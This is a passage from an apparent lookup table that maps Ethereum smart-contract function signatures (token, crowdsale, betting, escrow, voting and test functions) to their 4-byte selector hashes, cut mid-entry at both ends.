"confirmAndExecuteWithdrawal()": "0x87eeddf8", "initiateWithdrawal(address,uint256)": "0xc8393ba9", "erase(uint256)": "0x1007f753", "PCPP()": "0x5a9d5c3c", "DVCToken()": "0x0ea1f459", "buyContract()": "0xde866db1", "performPayout()": "0x503caa1b", "triggerPayout()": "0x05a95f04", "releaseBets()": "0x87a2afb3", "getUserBets()": "0x12074a46", "pingOracle(uint256)": "0xe73c3c53", "triggerRelease()": "0x0c96c4ea", "nbagame()": "0x9bd6030c", "HOTCRYPTO()": "0xe1b4d6cb", "newUser(address,bytes20,uint64)": "0x60be5f70", "register(bytes20,uint64,bytes)": "0xffd9ca40", "timeout(address)": "0xaedd18dc", "mint(address,uint64)": "0x2893c5b0", "createUser(address,bytes20,uint64)": "0xab108915", "newPeriod(uint256)": "0x21d6cdb6", "setMod(address)": "0x376d567c", "Karma(uint256)": "0xba922e04", "BtradeWhiteList()": "0x3ae0e63f", "Ordient()": "0xf3fc7fb2", "TerpCoin()": "0x1b70a2e1", "ACAToken(uint256,address,address)": "0x5bcd3dba", "Ubiou(uint256,string,string)": "0x65bcaf4a", "isWithinAllocation(address,uint256)": "0x52185f0e", "isWithinPeriod(address)": "0xb4d314f2", "batchActive()": "0x491dcfe9", "isBatchActive(uint256)": "0x0b280a29", "sencBalance()": "0x34d71238", "sencSold()": "0x43d9e070", "ethRaised()": "0xfddf0fc0", "updateAsset(uint256,string,uint256)": "0x92ec6ea8", "createAsset(string,uint256)": "0xdb9cc410", "EtherBetIO(address,address)": "0x7dbdf168", "LICToken()": "0xd8f45fdb", "forceReturn(address)": "0xd0072e59", "withdrawEndTime()": "0xb3b0c83f", "hardCapInTokens()": "0x1da9ea0c", "softCapInTokens()": "0xd3faaeca", "saleEndTime()": "0xed338ff1", "saleStartTime()": "0x1cbaee2d", "DeveciToken()": "0xcdbdc7a4", "LoveCrowdsale()": "0x012cd104", "getUnlockedAmount(address)": "0x420d4a02", "decreaseLockedAmount(address,uint256)": "0xa06b7eb0", "increaseLockedAmount(address,uint256)": "0x732726d1", "BuufmanToken()": "0x23a3335c", "updateAskingPrice(uint256,string)": "0x5947d616", "updateData(uint256,string,string)": "0x75b9b357", "createAsset(string,string,string)": "0xde58d156", "KarlisToken()": "0x29dd07eb", "isStatePublic()": "0x4b19eb09", "isStateTokensale()": "0xb2ef089a", "isStateInit()": "0xb508adb9", "closeTokensale()": "0x5e5b1e61", "openTokensale(address)": "0x5f14e108", "closeEvent(bytes32)": "0xc6bd9187", "transferReward(uint256,address)": "0x469507c6", "getArrayHashLibry(bytes32)": "0x020e2d48", "getWinConditionInLibra(bytes32)": "0xa57429e2", "getInfoLibra(bytes32)": "0x3c1c423c", "createLibra(bytes32[],bytes16[],uint256[])": "0xfd35c16d", "closeBets(bytes32,bytes32,uint256,uint256)": "0x7a5f5021", "recordingResultsOfBet(bytes32,bytes32[],uint8[])": "0x1c6ef374", "acceptBet(bytes32,bytes32,bytes32,bool)": "0x6b61c3c7", "cancelBet(bytes32)": "0x2940ff1e", "createBetWithPayable(bytes32,bytes32,bytes16,bytes32,uint256)": "0x80fe4958", "createEvent(bytes32,bytes32[],bytes16[],uint256[])": "0x3d226146", "depositLiquidateThePool()": "0xd1809fe8", "withdrawEthForUser(uint256)": "0xd631eed7", "getStatusModerator(address)": "0x20d0c13c", "multiply(uint256,uint256,uint256)": "0xb3a9b5f6", "save4(address,bytes,string)": "0xdc2e47c8", "save3(address,bytes,string)": "0x916a476e", "save2(address,bytes,string)": "0x8c02e029", "save1(address,bytes,string)": "0xe8c3a65f", "decrypt(address,bytes,string)": "0xcec8d277", "withDrawAnyERC20Token(address,uint256)": "0x94429fa6", "antToken()": "0x4ec42e8e", "buy_Vault(uint256,bytes8)": "0x29f321e4", "TronX()": "0xbdaa80c1", "control(address)": "0xb657c996", "denyAccess(address)": "0x61afd5ac", "allowAccess(address)": "0xc4a85bc1", "setBlance(address,address,uint256)": "0x76cce072", "deletePerson(uint256)": "0xd08c6803", "createPerson(string,string,uint256,uint256,uint256)": "0x6227ed6e", "getPersonsCount()": "0x8f97cff0", "changeBaseValue(uint256,uint256,uint256)": "0xc73997b1", "ArtifactCoin(address)": "0x4c7a5c0f", "gonIIToken()": "0xf19fc6ab", "getRemainCount(address)": "0x684bd9d6", "exportFund()": "0x51c65298", "onDraw()": "0xf3b16265", "setFund()": "0xdc021628", "joinCount()": "0x014f7f22", "setParam(uint256)": "0x4a45d2e6", "roundEnd()": "0xc02e580e", "joinDraw(uint256)": "0x61da46c4", "determineNewRoundMostInviter(uint256,uint256)": "0xa00a7a6d", "isSameDay(uint256,uint256)": "0x4fa48a88", "LivingstonCoin()": "0x061d5102", "BUZZ()": "0xd535268d", "FlexionCoin()": "0x0206432d", "TutorialToken(uint256,string,uint8,string)": "0x96401470", "testico()": "0xac95be9b", "getNextReleaseTimeOf(address,address)": "0x581fc2ad", "getLockedBalanceOf(address,address)": "0xc541783c", "getAvailableBalanceOf(address,address)": "0xce50f72d", "depositETH(address,uint256)": "0x2e599054", "depositERC20(address,address,uint256,uint256)": "0xf219fa66", "KKOGToken()": "0x6b097cd0", "sendEther(address,address)": "0x80330982", "resetAllVotes()": "0xd4d0e931", "resetVoteCount(uint256)": "0xbcbf7229", "clearAllCandidates()": "0x1d29de63", "removeCandidate(uint256)": "0x09e9d7e2", "GridcubeToken()": "0x2a595dd2", "setYxName(address,address,string)": "0xee38cad3", "_activeness2level(uint256)": "0x8e6d2599", "_influenceAlgorithm(uint8,uint256)": "0x23cb7b19", "batchPopularitySetting(uint256[],uint8[])": "0x05bf4ecc", "popularitySetting(uint256,uint8)": "0x0fce349e", "batchActivenessUpgrade(uint256[],uint256[])": "0xb7b47e31", "activenessUpgrade(uint256,uint256)": "0x26f35ff2", "batchBuild(uint256[],int256[],int256[],uint8[])": "0x079e0e0e", "build(uint256,int256,int256,uint8)": "0x34122952", "isBuilt(uint256)": "0xa013ab77", "weightsApportion(uint256,uint256)": "0xae9f96c7", "levelByToken(uint256)": "0x4b242252", "influenceByToken(uint256)": "0x67a7804b", "safePay(uint256,uint256,address,bytes)": "0x33c91611", "sendEth()": "0x06e99fef", "Cindicator()": "0xd2d44955", "AMULETS()": "0x025cce45", "RatingToken(address,uint256)": "0x3cbcf9a4", "CSAToken(uint256,string,string)": "0x7544ac1f", "withdrawalTokens(address,address,uint256)": "0x79412da6", "EthaToken()": "0xe6c3329d", "EligmaCrowdsaleContract()": "0xc6e08ba9", "setCrowdsaleStartBlock(uint256)": "0xc426fbb6", "setMintingContractAddress(address)": "0x746584b4", "calculateTokenToEth(uint256,uint256)": "0x80948ddd", "calculateEthToToken(uint256,uint256)": "0x4b1cab4e", "doCrowdsaleMinting(address,uint256)": "0x89f47b64", "doPresaleMinting(address,uint256)": "0x77dcb4f9", "showTokenBalance(address)": "0x534992c8", "finish(address,address)": "0xdd9bc47e", "setNewEndTime(uint256)": "0x4e458cc2", "setNewStartTime(uint256)": "0xaf6375cd", "mintBountytokens(address)": "0x18df6090", "NacContract(uint256,uint256,uint256,address,uint256,uint256)": "0xc0ccc863", "ProofOfContractSnipers()": "0x44ad5535", "setReceivers(address[],uint256)": "0x86420710", "Spole()": "0xb999abbc", "collectRevenue()": "0xed14d17e", "deliver(address)": "0xe515cd38", "outstandingTokens(address)": "0xfdb406cb", "buyReferral(address)": "0x4830e266", "fpDiv(uint256,uint256)": "0x549eca74", "safeAddI(int256,int256)": "0x9a04ab73", "fpMulI(int256,int256)": "0xf15afa50", "longMul(uint256,uint256)": "0x3e65a153", "fpMul(uint256,uint256)": "0xf6a176ae", "log_2(uint256)": "0x00ff2fb1", "mostSignificantBit(uint256)": "0xe6bcbc65", "setMaxTicket(uint256)": "0xffb24446", "setTokenRewardRate(uint256)": "0xfd1075d0", "setActivityState(bool)": "0x7581aa5f", "LuckyBaby()": "0xd6bb358e", "award(uint256,address)": "0xa3ae2f5c", "Veegotoken(uint256,uint256)": "0x1a92e6da", "Insureum(uint256,uint256)": "0xb920c799", "Oculta(uint256,string,string)": "0x011aab02", "clearValueBonuses()": "0x29033133", "insertValueBonus(uint8,uint256,uint256)": "0x702b7bc3", "changeValueBonus(uint8,uint256,uint256)": "0xd4b03d34", "removeValueBonus(uint8)": "0xcf51ee7a", "setActiveValueBonus(bool)": "0xc865cadb", "Eightk()": "0x7fec5d33", "closeWall()": "0x996f3247", "getMessageTimestamp(uint256)": "0x5cfb4aa4", "getMessageSender(uint256)": "0xd208fd60", "InternetWall()": "0x5cf6a536", "checkinter()": "0xd218f92d", "destroykill()": "0x4706840e", "withrawFee()": "0x3a689082", "withrawWin(address,uint256)": "0x9aeb69a2", "getTotalGames()": "0x5bd4349b", "getLastWinnerTicket()": "0x5163311e", "getEndBlock()": "0xfb7a5f4f", "getPlayerBet(uint256)": "0x3fa1930d", "getPlayerAddress(uint256)": "0x65225665", "getActivePlayers()": "0x3c4f5a66", "Etherumble()": "0x14f685a8", "generateReserve()": "0xc633eb24", "changeReserveBountyRecipient(address)": "0x93683f3d", "changeReserveTeamRecipient(address)": "0x2fcb20e9", "getBalancesOfAddress(address)": "0x5dc2157d", "changeReserveTeamRecepient(address)": "0xca2317dd", "ShineCoinToken(address,address,uint256,string,uint8,string,bool)": "0x9737bc41", "TWIMToken()": "0x0a213e5b", "ZoosCoinToken()": "0xfbdf45c8", "TKXToken()": "0xf3436c85", "Coinlancer()": "0x68d77366", "PoWMiB()": "0x6460c353", "disperseToken(address,address[],uint256[])": "0xc73a2d60", "CHSToken()": "0xcd45e561", "JCB()": "0xe32b349a", "usePlayerToken()": "0x1549c1e2", "getPlayerUsableTokensCount()": "0x47bdeedf", "getFibo(uint256)": "0x75bcf09f", "createPlayerToken()": "0x4640f28d", "createPoolIfNeeded()": "0x7ec20127", "createPlayer()": "0x3fa9fcf8", "createPool()": "0x9a06b113", "distributeReward(uint256)": "0x940a4e45", "joinPool(uint8)": "0xb149ece0", "openPool(uint8)": "0xc83a981c", "Fibonzi()": "0x00dff399", "LGOToken()": "0x27899d9b", "VGS()": "0xf2db5493", "VibeCoin()": "0x111bc51a", "TXL()": "0x5a3a6ef8", "sendTokens(address[],uint256[],address)": "0x81baf3ab", "LiverpoolvsManCity()": "0x4fdc5f65", "AishaCoin()": "0x684e2345", "burnFinish()": "0x58df0383", "OneStep()": "0x25ad7f2e", "createShapeShiftTransactionPost(string,string)": "0x25fa5ae1", "isValidateParameter(string,uint256)": "0xc2fcbf37", "settle()": "0x11da60b4", "unlock(bytes,bytes,bytes32)": "0x080c8a83", "updateTransfer(bytes)": "0x28aa5257", "close(bytes,bytes)": "0xf3b77f30", "transferredAmount(address)": "0xf2eec570", "addressAndBalance(address)": "0x76d173a9", "partner(address,address)": "0xf48edf0c", "NettingChannelContract(address,address,address,address,uint256)": "0xab779505", "createSspAndChannels(address,uint256,string,address[],address[],uint256[],address,string,bytes,uint32[])": "0x7bee30ce", "createSsp(address,uint256,string)": "0xdb059dfb", "SspManagerContract(address,address)": "0xc96492c4", "callchecked()": "0x633ab5e0", "callnotchecked()": "0xe3bea282", "finishDApp(bytes32)": "0x11056874", "payNode(bytes32,bytes32)": "0x5cf3cd96", "startDApp(bytes32)": "0x08a9ec7a", "createDApp(bytes32,uint32)": "0xf622a105", "setIPAddress(bytes32,bytes32,address)": "0x8d7f26e9", "setState(bytes32,bytes32)": "0x389e4839", "penalizeNode()": "0x7aff5061", "removeNode()": "0xd0d3f5ba", "createNode(bytes32,bytes32,bytes32,address)": "0x5b9f7cbe", "Withdrawable()": "0xc8520131", "withdrawFrom(address,uint256)": "0x9470b0bd", "withdrawAllFrom(address)": "0xf957ddba", "withdrawFor(address[],uint256[])": "0xdfb1913d", "withdrawAllFor(address[])": "0xefcefb40", "_validRating(uint8)": "0x72a6a480", "_emitSkillEvaluated(address,address,uint8,uint256,uint256,uint256)": "0x00e520d0", "_emitCategoryEvaluated(address,address,uint8,uint256,uint256)": "0xa8514113", "_emitAreaEvaluated(address,address,uint8,uint256)": "0xf066844e", "_emitSkillRatingGiven(address,address,uint8,uint256,uint256,uint256,uint256)": "0xa1d4c7ce", "_emitJobRatingGiven(address,address,uint256,uint8)": "0xdecdffbb", "_emitBoardRatingGiven(address,uint256,uint8)": "0x3162360d", "_emitUserRatingGiven(address,address,uint256)": "0xe8689bf8", "emitSkillEvaluated(address,address,uint8,uint256,uint256,uint256)": "0xadf8a01b", "emitCategoryEvaluated(address,address,uint8,uint256,uint256)": "0x23dfed97", "emitAreaEvaluated(address,address,uint8,uint256)": "0x5f542c94", "emitSkillRatingGiven(address,address,uint8,uint256,uint256,uint256,uint256)": "0x5a0ae8d5", "emitJobRatingGiven(address,address,uint256,uint8)": "0xc2844c60", "emitBoardRatingGiven(address,uint256,uint8)": "0x5e191293", "emitUserRatingGiven(address,address,uint256)": "0x8eb76eed", "evaluateMany(address,uint256,uint256[],uint256[],uint8[])": "0x48906c27", "_evaluateSkill(address,uint8,uint256,uint256,uint256)": "0x57d083b5", "evaluateSkill(address,uint8,uint256,uint256,uint256)": "0x7328f531", "getSkillEvaluation(address,uint256,uint256,uint256,address)": "0xf49727bd", "_evaluateCategory(address,uint8,uint256,uint256)": "0x54a035aa", "evaluateCategory(address,uint8,uint256,uint256)": "0x4b931600", "getCategoryEvaluation(address,uint256,uint256,address)": "0xd503ef95", "_evaluateArea(address,uint8,uint256)": "0x60a1f397", "evaluateArea(address,uint8,uint256)": "0xc543ae53", "getAreaEvaluation(address,uint256,address)": "0xd8baa905", "getSkillRating(address,uint256,uint256,uint256,uint256)": "0xd604d6a8", "_checkSetSkill(uint256,address,uint8,uint256,uint256,uint256)": "0x978bc247", "_checkAreaAndCategory(uint256,uint256,uint256)": "0x23db3e50", "rateWorkerSkills(uint256,address,uint256,uint256,uint256[],uint8[])": "0x90e8317c", "getBoardRating(address,uint256)": "0xba1b44da", "setBoardRating(uint256,uint8)": "0xc13862ea", "setJobRating(address,uint8,uint256)": "0x5d450bab", "getJobRating(address,uint256)": "0x8739cacf", "setUserRating(address,uint8)": "0x6ed55eb5", "getUserRating(address,address)": "0x488ede8b", "setBoardController(address)": "0x2caef765", "setUserLibrary(address)": "0xec2b50bf", "setJobController(address)": "0xcc494291", "getJobsBoard(uint256)": "0xb1bf0510", "getUserStatus(uint256,address)": "0xe575df72", "getFinalState(uint256)": "0xcb56dd79", "getJobSkills(uint256)": "0xdce722dd", "getJobSkillsCategory(uint256)": "0x0d9f2817", "getJobSkillsArea(uint256)": "0x0e1a9e3f", "getJobWorker(uint256)": "0x36dd20a7", "getJobClient(uint256)": "0x14f60881", "getJobState(uint256)": "0x53bc1c12", "hasSkill(address,uint256,uint256,uint256)": "0xcfba0279", "hasCategory(address,uint256,uint256)": "0x7e441048", "hasArea(address,uint256)": "0x5fce627e", "testerCanReentrant()": "0x98e8c54f", "testerReentrant()": "0x77097bfa", "testerCanNotReentrant()": "0xb358755e", "testerNonReentrant()": "0x4ce6a74e", "validate(uint256,bytes)": "0xefbe62e8", "PersianTokenICO(uint256,uint256)": "0x4e7a6978", "isICOEnded()": "0xa10f42c4", "isICOOpen()": "0x925ac216", "estimateBalanceOf(address)": "0x5b72cdd0", "getLastYearOfInflation()": "0x9fa9559c", "runAnnualInflation()": "0xcd2ec3fe", "Wishcoin()": "0xf30398ef", "getFee()": "0xced72f87", "payVisa(uint256,uint256)": "0xb559490d", "applyForVisa(uint256,uint256)": "0xb25af26f", "createPassport(uint256,bytes32)": "0xb91d1aed", "Citizen(address)": "0xf58431fd", "test_BasicThrow()": "0x86d4ebf7", "test_basicUnitTest()": "0x75fd4c23", "FlightDelayAddressResolver()": "0x7c331b52", "getDisputesToSolve()": "0xb684ccad", "getKarma()": "0xc47031ab", "gainKarma(int256)": "0x686f21ba", "withdrawSaleBalances()": "0x86013322", "bulkCreateLamboSale(uint256,uint256,uint256)": "0xb34d471d", "createLamboSale(uint256,uint256)": "0xcfe7e7a0", "setMarketplaceAddress(address,address)": "0x2fc71565", "getOptionsForModel(uint64)": "0xf0aaf4ec", "getOptionCount()": "0xa6bd5427", "getOption(uint256)": "0x1ce5e9a6", "enableTuneOption(uint256)": "0x397656c6", "disableTuneOption(uint256)": "0x0f819fe8", "_changeTuneOption(uint32,uint32,uint256,bool,bool,uint128,bool,uint64,uint256)": "0xd2273f37", "_newTuneOption(uint32,uint32,uint256,bool,bool,uint128,uint64)": "0x663b8c5a", "changeTuneOption(uint32,uint32,uint256,bool,bool,uint128,bool,uint64,uint256)": "0xab3bd81f", "newTuneOption(uint32,uint32,uint256,bool,bool,uint128,uint64)": "0xcc38639f", "ServiceStation(address)": "0x4b5dcad7", "_changeAttributes(uint256,uint256)": "0xbf552230", "_tune(uint256,uint256)": "0xdba2a570", "removeAffiliate(uint256)": "0x86e2c40c", "getAffiliate(uint256)": "0x3be46378", "createAffiliate(uint256,uint64,uint64,address,address)": "0x322471cf", "getSale(uint256)": "0xd8f6d596", "cancelSaleWhenPaused(uint256)": "0x23edfb89", "cancelSale(uint256)": "0xbd94b005", "bidReferral(uint256,uint256)": "0x3971eea1", "createSale(uint256,uint256,address)": "0x995cd653", "setNFTAddress(address,uint256)": "0x097d44a8", "MarketPlace(address,uint256)": "0x0cc00bc9", "_removeAffiliate(uint256)": "0x41bd84aa", "_removeSale(uint256)": "0x21978e58", "_cancelSale(uint256,address)": "0xaf6bb824", "_tuneLambo(uint256,uint256)": "0x5eda17bc", "_createLambo(uint256,address,uint64)": "0x2f94e335", "getLamboModel(uint256)": "0xa080c8ba", "getLamboAttributes(uint256)": "0x35347560", "tuneLambo(uint256,uint256)": "0x313138e1", "BTC7500on49()": "0xed92f0a0", "BpsToken()": "0x82f867a4", "NiewGold()": "0xdce98784", "initialFunding(address,address,uint256)": "0xaca7fdd4", "Swap()": "0x3ebfdaaf", "checkBeatingPrice(uint256,bool)": "0x944c8929", "checkTrainingPrice(uint256,bool)": "0xfa28a6b6", "beat(uint256,bool,uint8)": "0x013a83f1", "train(uint256,bool,uint8)": "0xec0d69e3", "blankbreedingdata(uint256,bool)": "0xe70b793a", "_payout()": "0x74b5fb06", "_owns(address,uint256,bool)": "0x91449def", "_generateGene(uint64,uint64,uint256,uint256)": "0xf587c53f", "_birthPerson(string,string,uint64,bool,bool)": "0xe444a2e1", "readyTobreed(uint256,bool,uint256,bool)": "0x0e14f955", "prepareToBreed(uint256,bool,uint256,bool,uint256)": "0xfa6fc037", "breedOnAuction(uint256,bool,uint256,bool,string,string)": "0xc13fb08b", "breed(uint256,bool,uint256,bool,string,string)": "0xec0ea816", "SetGene(uint256,bool,uint64)": "0x871388c9", "createPersonGen0(string,string,uint64,bool)": "0x630e0ae6", "_approvedGen1(address,uint256)": "0xa35d78a6", "setDEV(address)": "0x69288540", "setprice(uint256,uint256)": "0x84317008", "getPersonParents(uint256,bool)": "0x3befedea", "getPerson(uint256,bool)": "0xe282969e", "allowexternalContract(address,uint256,bool)": "0x51584916", "setBreedingFee(uint256)": "0x4574dea5", "CelebrityBreederToken()": "0x5022d232", "getPerson(uint256)": "0x246982c4", "CelebrityToken()": "0x605ff295", "getDeveloperAddress()": "0x22a27f3b", "getBettingPrice()": "0x71b804ee", "getMaxContenders()": "0x3bee8726", "setBettingCondition(uint256,uint256)": "0x7847352a", "bet_various()": "0x66167617", "EtherSpermBank()": "0x4e7d656a", "DavidCoin()": "0xe8d11d9c", "disallowSale()": "0x42d544fb", "allowSale()": "0xd0f3aa80", "changeFundAddress(address)": "0xf9271fd3", "changeSaleAgent(address)": "0x5e8714d5", "RTCoin(string,string,uint8)": "0x20e0dc9f", "highCompose(uint256,uint256,uint256)": "0x91702ddc", "lowCompose(uint256,uint256)": "0x976f37fd", "_getFashionParam(uint256,uint16,uint16,uint16)": "0x8b23397a", "setDataAuction(address)": "0x245a30ec", "ActionCompose(address)": "0x0dd1d147", "_rankByNumber(uint256)": "0x2c4449ab", "_randByRange(uint256,uint256)": "0xdbb82429", "MyDanaToken()": "0xe65b96a7", "GayCoin()": "0x315d142d", "unlockMiner()": "0x7e241dbf", "unlockSecondPrivate()": "0xc9f84e1a", "unlockFirstPrivate()": "0x909e8f92", "SeeleTokenLock(address,address,address)": "0x1281619b", "FIESTA()": "0x41a6f46e", "DCVToken()": "0x09b0ce3c", "BTCT()": "0x84837981", "adjustBalance(address,int256)": "0xecbc8fa7", "ARPToken()": "0x911a40c9", "validateOrderHash(bytes32,address,uint8,bytes32,bytes32)": "0x62cb1ac2", "removeWhitelistedUserAddr(address)": "0xaaa6bc40", "addWhitelistedUserAddr(address)": "0x29b1ce4d", "removeWhitelistedTokenAddr(address)": "0x68df4dda", "addWhitelistedTokenAddr(address)": "0x9324dfff", "SwissCryptoExchange(address,address,address,uint256,uint256,uint256)": "0x91b1a02a", "shiva()": "0x0064575f", "reading()": "0xfffd52c6", "orientation()": "0x5b4b1c0e", "spread(uint8)": "0xcbad60b6", "random(uint8,uint8)": "0x0e2833eb", "draw_random_card(uint8)": "0xa8a618e9", "draw(uint8,uint8)": "0x638d4788", "DinosaurFarmer2()": "0xc41f48a3", "UbexToken(uint256)": "0xd4384156", "getBetWaitEndEther()": "0xb3487a71", "getBetsLength()": "0xcc4580c8", "getBets(uint256,uint256)": "0xe1287520", "sendCancelValue(address,uint256,bool)": "0x4d0cac9d", "refreshWaitPairBetIDsByCancelBet(uint256)": "0x171efc3f", "cancelBet(uint256,bool,uint256)": "0x15087f7d", "cancelBetByOwner(uint256)": "0x669cab39", "cancelBetByB(uint256)": "0x6999d38f", "cancelBetByA(uint256)": "0xad879a46", "cancelBetByPlayer(uint256)": "0x7ea2fc89", "findNextwaitPairBetIDs(uint256,uint256)": "0xd94a0a7d", "getBetPriceID(uint256)": "0xbc431846", "doBet(uint256)": "0xb8a1e355", "setSendErrorValue(address,uint256)": "0x5ca3bf76", "setBetPrices(uint256[])": "0xea6a49ea", "clearWaitPairBets()": "0x63ab7a25", "getProfitToAddress(uint256,address)": "0xa737ecc9", "setOraclizeCallbackGasLimit(uint256)": "0xd3b5695c", "setBetFee(uint256)": "0x72229abf", "STEM()": "0x8091bfc9", "reclaimERC20(address,uint256)": "0xafdbd499", "FLOCK()": "0x70c1854e", "processTransfer(address,address,uint256,bytes)": "0x4d0d1cb9", "WePOW()": "0xe0755b35", "DLVO()": "0x2b3ff9e9", "SafeToken()": "0x62aabb9e", "ERC223Token(uint256,string,uint8,string)": "0x11a10698", "multiSend(uint256,address[])": "0xcb02ba28", "SEKCapitalToken()": "0xca28d2ae", "EOCToken(uint256,string,string)": "0xb90b9aea", "MoreGainCoin(uint256,string,string)": "0x5d064bab", "TokenBurn(uint256)": "0xf46d91f4", "getPoSReward(address,address)": "0x8e26a223", "ownerSetStakeCommence(uint256)": "0xda328377", "tipbot()": "0x04699a72", "sendBountyTokens(address,uint256)": "0xf3d9bc65", "sendOtherTokens(address,uint256)": "0xf5012d4b", "totalBuyTokens()": "0xd132a8f4", "getCurrentDiscountPercent()": "0xe3524d36", "changeNotSoldTokens(address)": "0x2ca2537e", "changeTeamTokens(address)": "0x7c9cbd38", "callSomeFunctionViaInner1()": "0xf79d0a8b", "callSomeFunctionViaOuter()": "0x0cea64a0", "callDefaultRelease()": "0x3dbba05c", "delayDefaultRelease()": "0x83bf1cbc", "BurnableOpenPayment(address,uint256,bool,uint256,string)": "0xce686e62", "newBurnableOpenPayment(address,uint256,bool,uint256,string)": "0x3695672b", "getMintDigest(uint256,bytes32)": "0x9e37273b", "_0xEtherToken()": "0xf6ee87b8", "CityLifePlusToken()": "0x66550624", "startPrice(uint256)": "0x3a8bcc91", "TheWhaleWins()": "0x2004b6a6", "BugisContract()": "0x7e5af26c", "AirDropRedeemAFTK2()": "0xef3088d1", "MMR(address)": "0x91684f8d", "TimeCapsule()": "0x45044611", "Ghcwchain(uint256,string,string)": "0xd5a8c0d9", "MANHATTANPROXY11THWEAVE()": "0x4a61179b", "KiwiCoin()": "0x39cd9dba", "getVotePrice()": "0x1906ff98", "getVotingStatus()": "0x581c281c", "getRestarTime()": "0x745332fe", "voteResultPublish(address[],uint256[])": "0xf276e1c7", "getVoteResult()": "0x8742fc3b", "_isOne(address)": "0xc56ecdfa", "_isReady()": "0xd1bcbf6c", "changevotePrice(uint256)": "0x006ddae3", "changeRestarTime(uint32)": "0x6b061d7a", "stopVoting()": "0xfab2f86b", "MultiToken()": "0xaa24da73", "enableCodeExport(address)": "0x27e728ec", "deployMultiToken()": "0x5ee2a018", "getEscrowDeposit(string)": "0xc5ecfc61", "withdrawAccumulatedFees(address)": "0xc1f10663", "release(string)": "0xf34e3723", "deposit(string,uint256,bytes,uint8,bytes32,bytes32)": "0x40b00033", "BiddableEscrow(address)": "0xa6393784", "inflate(address,uint256)": "0x3d3b26a6", "TorusCoin(uint256,address)": "0xfd72a11a", "updateRewardForContributor(address,uint256,string)": "0xe7984a3b", "addRewardforNewContributor(address,uint256,string)": "0x748ce291", "withdrawRewardedTokens(address,uint256)": "0x3a024d1c", "StarbaseMarketingCampaign(address)": "0x8a3e37c3", "ToToken()": "0x9a51a31a", "__beneficiaryTransfer(uint256)": "0x46fc9037", "__redeemTokens(address,uint256)": "0x0fd3ee83", "__redeemAmount(address)": "0xf9154476", "__issueTokens(address,uint256)": "0xf1895e08", "__allocateTokens(address)": "0x36ebc4dc", "Crowdsale(string,uint256,uint256,uint256,uint256,uint256,uint256,address,address)": "0x6a0d783c", "buyTokens(address,uint256,address)": "0x819512cd", "testBitXorSuccess()": "0x31be6985", "queueLength()": "0xab91c7b0", "testBitsOrFailIndexOOB()": "0x2581c674", "popRequest()": "0xe4690a0b", "testBitsOrSuccess()": "0xec0f1025", "addRequest(uint256)": "0x4ca1fad8", "testBitOrFailIndexOOB()": "0x91e8d3dc", "QueueUserMayBeDeliveryDroneCotnrol()": "0xfd83f3e3", "testBitOrSuccess()": "0xa1616429", "testBitsAndFailIndexOOB()": "0xda2b7416", "claimMiningReward()": "0xd588acc4", "testBitsAndSuccess()": "0xbac1e2e0", "testBitAndFailIndexOOB()": "0xc388cca6", "testBitAndSuccess()": "0x2b785960", "find_strike(uint64,uint32,uint32)": "0x1e44c112", "testBitsEqualFailIndexOOB()": "0xfbffb355", "remove_deal(uint32)": "0x10e89b22", "testBitsNotEqualSuccess()": "0x74087040", "insert_deal(address,address,uint64,uint128,uint32)": "0x6f36ce79", "testBitsEqualSuccess()": "0x64a4a5d7", "testBitEqualFailIndexOOB()": "0x8a120dc9", "remove_order(uint32)": "0xb2d37e95", "testBitNotEqualSuccess()": "0xf362d78f", "insert_order(address,bool,uint32,uint128)": "0x4e6ab570", "testBitEqualSuccess()": "0x42a745cb", "finalize(uint24)": "0xf41017fc", "testBitsSetFailIndexOOB()": "0xf85aefba", "cancel(uint32)": "0x1381e400", "testBitsNotSetSuccess()": "0xf1cff4b5", "testBitsSetSuccess()": "0x6d052f56", "order(bool,uint32,uint128)": "0xfc63d4fb", "testBitSetFailIndexOOB()": "0x2145e36c", "balance_of(address)": "0xb144adfb", "testBitNotSetSuccess()": "0x254c91b3", "deal_details(uint32)": "0xeef547d7", "testBitSetSuccess()": "0xdaa21e0e", "best_adjustment_for(bool,uint128)": "0x414053be", "testToggleBitFailIndexOOB()": "0x7af30442", "testToggleBitSuccess()": "0xe706918c", "best_adjustment(bool)": "0xd7ef1356", "testClearBitFailIndexOOB()": "0x0aa46c12", "CFD(address)": "0x7057c20d", "testClearBitSuccess()": "0x8ba9f354", "get_timestamp()": "0x2212dbc3", "testSetBitFailIndexOOB()": "0x69f18967", "testSetBitSuccess()": "0x68e4bd99", "note(uint224)": "0x98596726", "__callback(bytes,string,bytes)": "0x4894e37f", "testGetBitsFailIndexOOB()": "0xc8bb73ef", "Oracle()": "0xf24a534e", "KrakenPriceTicker()": "0x5a353193", "testGetBitsSuccess()": "0xfadf87b1", "testGetBitFailIndexOOB()": "0x4f76cb02", "testGetBitSuccess()": "0x639d57f2", "setup(address,uint256,uint256,uint256,address)": "0x670c884e", "get_status()": "0x39aaba25", "CrowdSale()": "0x0109f22e", "get_party2_balance()": "0xb8017221", "getCreatorDotBalance()": "0xf363441f", "get_party1_balance()": "0xe9a9c1b4", "getCreatorBalance()": "0xa4325485", "get_amount()": "0xb9e6f1d9", "creatorBalanceChecker()": "0xa89a4f09", "get_party2()": "0xd81a91e9", "get_party1()": "0x4cedf74e", "breakit()": "0x74389991", "BreakableBond(address,address,uint256)": "0x714064f3", "rollDice()": "0x837e7cc6", "bet()": "0x11610c25", "Lottery()": "0x4245b0f7", "getNumProposals()": "0x798974dd", "executeProposal(uint256)": "0x0d61b519", "voteAgainst(uint256)": "0x750e443a", "vote(uint256,int256)": "0x5e44daf3", "register(bytes,address)": "0xa99e7e29", "newProposal(address,uint256,bytes,bytes)": "0xdbc45228", "voteFor(uint256)": "0x86a50535", "nibbleToChar(uint256)": "0xe8a1c08f", "setup(address)": "0x66d38203", "Democracy()": "0x8c4dd5cd", "b32ToBytes(bytes)": "0x86c57fcc", "sendToken(address,uint256)": "0x412664ae", "unregister(bytes,address,uint256,bytes)": "0xa7dfc874", "arrival()": "0x11e99c22", "register(bytes,address,address,uint256,bytes)": "0x97daa043", "releasePayment()": "0xd116c8c4", "getPeriodInfo()": "0x8d227fc0", "forward_method(bytes,address,uint256,bytes)": "0x45d27edf", "escrow()": "0xe2fdcc17", "newPeriod()": "0x5e11544b", "forward(address,uint256,bytes)": "0xd7f31eb9", "agreement(bytes,bytes,bytes)": "0x7b789b3d", "GoldTxFeePool(address,address,bytes)": "0x7e3faec1", "Shipment(bytes,bytes,bytes,bytes,string,bytes,uint256,uint256,bytes,bytes,uint256,uint256,string,bytes,bytes,bytes)": "0xaf93afdd", "Collector(address,address,uint256)": 